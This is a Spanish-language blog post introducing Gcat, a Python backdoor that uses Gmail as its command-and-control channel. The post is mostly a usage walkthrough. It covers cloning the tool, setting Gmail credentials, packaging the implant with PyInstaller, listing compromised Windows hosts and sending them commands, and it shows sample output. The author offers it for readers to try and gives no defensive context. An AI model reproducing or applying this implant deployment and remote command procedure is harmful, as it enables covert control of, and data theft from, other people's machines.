Hoy he visto un backdoor bastante interesante que usa Gmail como servidor de Control y Comandos, que aunque no lo pude probar inmediatamente ya que no contaba con una máquina con Windows a la mano, quiero hablar sobre el para que lo prueben. De todas maneras en la tarde de hoy voy a hacer mis respectivas pruebas y a actualizar el post. Según lo investigado el Backdoor es funcional aunque se encuentra en sus inicios y le hace falta muchas características pero ya puede ser usado para algunas tareas, este backdoor se llama Gcat.
Para que funcione requiere de:
- Una Cuenta de Gmail, preferiblemente solo para esto y no personal
- Que enciendan la Opción “Allow less Secure Apps” en las opciones de seguridad de Gmail
Para hacer uso de la Herramienta solo tienen que clonar el Repo
$ git clone https://github.com/byt3bl33d3r/gcat
$ cd gcat/
Tendrán 2 archivos
gcat.py , que es el Script usado para ejecutar los comandos a los clientes disponibles
implant.py , que es el Backdoor que debemos desplegar, debemos hacerlo ejecutable con Pyinstaller
En ambos archivos es necesario editar las variables de gmail_user y gmail_pwd con los datos correspondiente a la cuenta de gmail.
Uso de la Herramienta
$ python gcat.py –help
Una vez Desplegado el Backdoor en los sistemas (implant.py) , pueden consultar los sistmeas disponibles
$ python gcat.py -list
f964f907-dfcb-52ec-a993-543f6efc9e13 Windows-8-6.2.9200-x86
90b2cd83-cb36-52de-84ee-99db6ff41a11 Windows-XP-5.1.2600-SP3-x86
La salida es un string UUID que identifica el sistema y el sistema operativo donde tenemos implantado el Backdoor
Para ejecutarle un Comando
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -cmd 'ipconfig /all'
[*] Command sent successfully with jobid: SH3C4gv
El comando nos da un ID donde podamos consultar la Salida
#~ python gcat.py -id 90b2cd83-cb36-52de-84ee-99db6ff41a11 -jobid SH3C4gv
DATE: 'Tue, 09 Jun 2015 06:51:44 -0700 (PDT)'
JOBID: SH3C4gv
FG WINDOW: 'Command Prompt - C:\Python27\python.exe implant.py'
CMD: 'ipconfig /all'
Windows IP Configuration
Host Name . . . . . . . . . . . . : unknown-2d44b52
Primary Dns Suffix . . . . . . . :
Node Type . . . . . . . . . . . . : Unknown
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
-- SNIP --
Por el momento se trata de esto, pero según los datos en GitHub, pretenden darle mucho más funcionalidades como son:
- Multiplataforma
- Capacidad de Subirle Archivos
- Cifrado y ofuscación en el transporte
Me parece bastante interesante y con más funcionalidades puede ser muy útil. Como comenté, en la tarde de hoy realizaré todas mis pruebas, si lo prueban antes, pues me comentan.
Links de Interés
Fuente: jsitech